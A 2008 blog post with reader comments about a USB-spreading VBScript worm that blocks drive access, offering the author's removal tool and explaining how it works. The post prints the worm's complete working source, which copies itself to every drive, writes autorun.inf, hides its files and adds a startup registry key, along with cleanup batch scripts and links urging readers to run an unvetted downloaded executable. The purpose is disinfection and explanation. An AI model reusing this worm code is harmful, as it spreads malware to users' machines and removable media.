Posted by: Anurag Ojha | April 19, 2008

Restore access to drives under My Computer

Does this happen with you?

  • You cannot access or enter the hard drives on your computer when you click on a partition say C or the D Drive?
  • You find an annoying autorun.inf or MSwin32.dll.vbs or r.cmd or bqk.bat or klp8j6i.com on all your flash drives and partitions?
  • Task Manager disabled? Cant view hidden files?
  • Startup is slow? PC hangs while booting up?


The Solution

  1. Download and run this file! Unlock.v1.2 from HERE or HERE (UPDATED July 08,2008 )
  2. Save all your work and Restart your computer

Note: The Script Killer file might take a few minutes to run and might display error messages. Its normal. The file will not do any harm. If it helped or if it didnt, please drop in a comment! thanks!

Read further only if you would like to read more about the problem and how I solved it! Also read my article on Removing the FlashDrive autorun.inf Virus for more info

A few words of explanation about the (so called) virus

The contents of a typical malicious autorun.inf

[autorun]
shellexecute=wscript.exe mswin32.dll.vbs

The contents of the file MSwin32.dll.vbs

‘ i like to be known as (udaipu) v1.02
‘ i made this virus because s3 umbi poi. it sucked.. so give me marks…..xxxrxextxxx

on error resume next
dim autoc,winpath,flashdrive,fs,mf,auto,tf,rg,nt,check,sd

auto = “[autorun]”&vbcrlf&”shellexecute=wscript.exe mswin32.dll.vbs”
set fs = createobject(“Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
autoc=autoc&text.readline
autoc=autoc & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\MSwin32.dll.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\mswin32.dll.vbs”,2,true)
tf.write autoc
tf.close
set tf = fs.getfile(winpath & “\mswin32.dll.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
set tf=fs.getfile(flashdrive.path &”\mswin32.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\MSwin32.dll.vbs”,2,true)
tf.write autoc
tf.close
set tf=fs.getfile(flashdrive.path &”\mswin32.dll.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write auto
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(“WScript.Shell”)
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”We want avinash sir back.”
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\Run\MSwin32″,winpath&”\mswin32.dll.vbs”

if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject(“Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname

For any person with basic understanding of scripts, it will be quite clear what this script is all about πŸ˜› and which settings on your computer are being changed.

What is wscript.exe ?

It is the Windows Scripting Host!

How I did I do it ?

Now this is the fun part πŸ˜€

The following operations are performed by the file:

  1. Terminates the Windows Processes wscript.exe and monit.exe.
  2. Deletes all autorun.inf files on system.
  3. Deletes all mswin32.dll.vbs files on system.
  4. Deletes all r.cmd files on system.
  5. Deletes all bqk.bat files on system.
  6. Deletes all klp8j6i.com files on system.
  7. Deletes the virus entry from startup/registry.
  8. Disables Scripting.

The file actually extracts these separate files in C:\

UNLOCK.BAT

@echo off
taskkill /IM wscript.exe
taskkill /IM monit.exe

dir/b/s/l/a-d c:\autorun.inf> out.bat
dir/b/s/l/a-d d:\autorun.inf>> out.bat
dir/b/s/l/a-d e:\autorun.inf>> out.bat
dir/b/s/l/a-d f:\autorun.inf>> out.bat
dir/b/s/l/a-d g:\autorun.inf>> out.bat
dir/b/s/l/a-d h:\autorun.inf>> out.bat
dir/b/s/l/a-d i:\autorun.inf>> out.bat
dir/b/s/l/a-d j:\autorun.inf>> out.bat
dir/b/s/l/a-d k:\autorun.inf>> out.bat
dir/b/s/l/a-d l:\autorun.inf>> out.bat
dir/b/s/l/a-d m:\autorun.inf>> out.bat
dir/b/s/l/a-d n:\autorun.inf>> out.bat
dir/b/s/l/a-d c:\mswin32.dll.vbs>> out.bat
dir/b/s/l/a-d d:\mswin32.dll.vbs>> out.bat
dir/b/s/l/a-d e:\mswin32.dll.vbs>> out.bat
dir/b/s/l/a-d f:\mswin32.dll.vbs>> out.bat
dir/b/s/l/a-d g:\mswin32.dll.vbs>> out.bat
dir/b/s/l/a-d h:\mswin32.dll.vbs>> out.bat
dir/b/s/l/a-d i:\mswin32.dll.vbs>> out.bat
dir/b/s/l/a-d j:\mswin32.dll.vbs>> out.bat
dir/b/s/l/a-d k:\mswin32.dll.vbs>> out.bat
dir/b/s/l/a-d l:\mswin32.dll.vbs>> out.bat
dir/b/s/l/a-d m:\mswin32.dll.vbs>> out.bat
dir/b/s/l/a-d n:\mswin32.dll.vbs>> out.bat

ECHO Deleting Virus files …
edlin out.bat <c:\attall.bat>nul
call out.bat
edlin out.bat <c:\delall.bat>nul
call out.bat

ECHO Deleting registry entries …
REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v MSwin32 /f
REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v monit /f
REG IMPORT
restorie.reg

ECHO Deleting temporary files …
del restorie.reg
del out.bat
rename out.bak out.bat
del out.bat
del attall.bat
del delall.bat
del unlock.bat

ATTALL.BAT

1,#rc:\*attrib -r -s -h “c:\
1,#rd:\*attrib -r -s -h “d:\
1,#re:\*attrib -r -s -h “e:\
1,#rf:\*attrib -r -s -h “f:\
1,#rg:\*attrib -r -s -h “g:\
1,#rh:\*attrib -r -s -h “h:\
1,#ri:\*attrib -r -s -h “i:\
1,#rj:\*attrib -r -s -h “j:\
1,#rk:\*attrib -r -s -h “k:\
1,#rl:\*attrib -r -s -h “l:\
1,#rm:\*attrib -r -s -h “m:\
1,#rn::\*attrib -r -s -h “n:\
1,#rautorun.inf*autorun.inf”
1,#rmswin32.dll.vbs*mswin32.dll.vbs”
e

replace * by pressing CTRL+P+Z in edit window

DELALL.BAT

1,#rattrib -r -s -h “c:\*DEL “c:\
1,#rattrib -r -s -h “d:\*DEL “d:\
1,#rattrib -r -s -h “e:\*DEL “e:\
1,#rattrib -r -s -h “f:\*DEL “f:\
1,#rattrib -r -s -h “g:\*DEL “g:\
1,#rattrib -r -s -h “h:\*DEL “h:\
1,#rattrib -r -s -h “i:\*DEL “i:\
1,#rattrib -r -s -h “j:\*DEL “j:\
1,#rattrib -r -s -h “k:\*DEL “k:\
1,#rattrib -r -s -h “l:\*DEL “l:\
1,#rattrib -r -s -h “m:\*DEL “m:\
1,#rattrib -r -s -h “n:\*DEL “n:\
e

replace * by pressing CTRL+P+Z in edit window

RESTORIE.REG

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
-“Window Title”
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
“Window Title”=”Microsoft Internet Explorer”

NOSCRIPT.EXE /silent

Disables scripting

After the operation is complete all the temporary files are deleted.

Download Noscript.exe and permanently disable scripts! or Read more on How to manually disable (or re-enable) the Windows Scripting Host, Symantec or read what Sophos has to say about it

Okay, the programming above is crude but hey it works πŸ˜‰

I want to reverse engineer this script to use its rapid spreading power against it. To make it cure the infection of all the systems it infects. Maybe in due time …

My congratulations to to the guys who made this virus/vbscript πŸ˜› has gotten into almost every system in my college

Comments and suggestions welcome and I hope it helps!

Advertisements

Responses

  1. Thanks much … it worked well and now i know more of what to look for.

  2. Overpopulation says : I absolutely agree with this !

  3. u r simply gr8.!!!!!!!!!!

  4. Pls Help It dosent work for me !!!!
    Please i have to remove it today.
    I have Tried urr unlock.v.1 but no effect on my drives

  5. Dear Hamza, ill more details about your problem! Unlock 1.1 works for only a particular strain of virus. Maybe the version your infected with is different, read my other post on this blog and try to follow the methods listed there.

  6. Hi guys,

    Download the new Unlock v.1.2 from here http://mihd.net/pvukj6e !

    Its should take care of autorun.inf or MSwin32.dll.vbs or r.cmd or bqk.bat or klp8j6i.com etc

  7. gr8, superb, wonderful!!!!!!!!!
    hats off 2 u……..
    πŸ™‚

  8. You asked for feedback. I tried your Unlock 1.2 fix but it made no difference… still no access to drives.

  9. Did you immediately restart your computer after running the patch?

    Try running the patch again by:
    0) Save all your work.
    1) [ctrl]+[alt]+[del] Task Manager
    2) Explorer.exe/Right Click/End Process Tree *WARNING* This will kill all your applications, and you will only see the task manager and the wallpaper in background.
    3) File/New Task/ Locate Unlock v.1.2.exe
    4) Wait for execution. After it gives a successful completion message, restart computer – Shut Down/Restart

  10. Is the person who made it a malayali engineering student? from kerala in india? avg detects it. and removes it without much problem.

  11. I dont know. These are the words of the virus author: “s3 umbi poi”

    Sounds south indian to me. “Poi” mean go home in Malayalam.

  12. […] >> Restore access to drives under My Computer Some of the symptoms of an infected […]

  13. Is this something I should do if I can’t open up “My Computer” or “My Documents” or anything like that? I can’t even open up my recycle bin, and when I try to open any of the above my screen flashes and all of my icons disappear for a second and then everything goes back to normal… I am not so smart with computers so I have no idea what the problem is.

  14. When your screen flashes what happens is that your session of windows crashes. This is because the system detected that something went wrong which it could not handle, so the user interface kinda closes and reloads.

    What you could do is install a good updated antivirus like ESET NOD32 and Spyware Doctor.

    Otherwise you will have to manually find and delete the virus. But since you are a novice i would recommend that you run this tool that i made http://mihd.net/pvukj6e It might solve your problem, though it was built for a different virus.

  15. Hi…
    I really thank you for sharing your tool for killing the viruses. but then, it doesn’t work for me. also, i have tried the steps on your other post but i still can’t remove the virus.
    when i typed type autorun.inf in the DOS mode, i saw that it opens a file named k36fevhw.cmd.
    please help me on this.. thank you…

  16. ” β€˜ i like to be known as (udaipu) v1.02
    β€˜ i made this virus because s3 umbi poi. it sucked.. so give me marks…..xxxrxextxxx ”

    Udaipu is a malayalam slang for “person playing tricks on others” and umbi poi is a slang for “sucked”.So clearly it is created by a malayali engnrng student who failed to score in s3 xams.Interesting !

  17. it is working man

    thanks

  18. hey pls help me too can i know the steps to remove this “We want avinash sir back” virus

  19. Hi Binu,

    Open Regedit
    – Start Menu/Run/ Type “regedit” [Enter]
    Browse down to Internet Explorer Setting page
    – HKEY_CURRENT_USER / Software / Microsoft / Internet Explorer
    Now find “Main” under Internet Explorer and after you click on it, find “Window Title” in the right side.
    Right click on “Window Title” which current must be having setting “We want avinash sir back” and change it to “Microsoft Internet Explorer”

    ALTERNATE(quicker)

    1. Open Regedit
    2. Press [CTRL]+F , Type “avniash” and Regedit will straightway take you to the key.
    3. Right Click/Modify the key!

  20. Thanks a ton !! but after changing the status in the reg to internet explorer it still shows the same line” we want avi….” do we have to save the new status and if so how .. pl advice….

  21. You will have to delete the Virus files first.
    Read the full post, and install the necessary softwares.
    Do a full system scan.
    Then try to manually change the registry.

  22. Dear Sir

    You tube and orkut are not running in my laptop

    I have downloaded mozilla also but while open mozilla one msg is coming that i hate mozilla try IE.

    Pl help

  23. Hi riya my pendrive have write protection so i can’t delete any file in pendrive it show “disk is write protected”There is no switch in my pendrive
    please help

  24. Hi,

    My system is hanging while start up. Sometimes it is not hanging. But when i click any drive, say d:/ or e:/, then it get hanged.

    Also i am not ablo to see the hidden files.

    As per your suggestion, i downloaded “Unlock.v1.2.exe” and executed. I got a messages the following messages..

    1. error: the process “wscript.exe not found
    .
    .
    .
    then “error file not found…”

    then “invalid file name”..

    then “disabling script”..

    then “deleting temporary files”

    then restart your computer

    then press any key to continue…

    Immedietly i restarted, again my system is hanging and still i am not able to see the hidden files.

    PLEASE HELP ME………………..

  25. hi… i got an autorun.inf on my 3 drives it has a subfolder, its name is immunity folder.. and a note that says “this file
    is a virus it should be deleted by itself”

    I can access all my drives there is no problem accessing it. My problem is that i have a psp and a sony ericsson phone, I want
    to put new games on my psp but my computer won’t let me copy paste anything from my pc to my devices. It prompts that my
    memory card is locked but it isn’t. i asked a favor to my office mate if he can change the games on my psp, and he did, so it’s
    not my memory card it’s my computer that has a problem.

    i followed your instructions and run unlock.v.1.2 only the notepad has been deleted. i also tried ending explorer in task
    and run unlock.v.1.2 and restart my computer but still the folder autorun.inf isn’t deleted and i can’t still copy paste anything
    from my pc to my device.

    pls. help me….
    thank you!

  26. Are The Program Worked?
    I Had Tried It But My Kaspersky Antivirus Was Blocked It!
    And My Computer Can’t Create DirectSound Already!
    It Will Say “Create DirectSound Error”
    Please Help Me…

  27. Hey, my computer does not even start, i can’t even make it safe mode… when that screen is there it blocks, so how can i install your program 😦
    thanks!


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Categories

%d bloggers like this: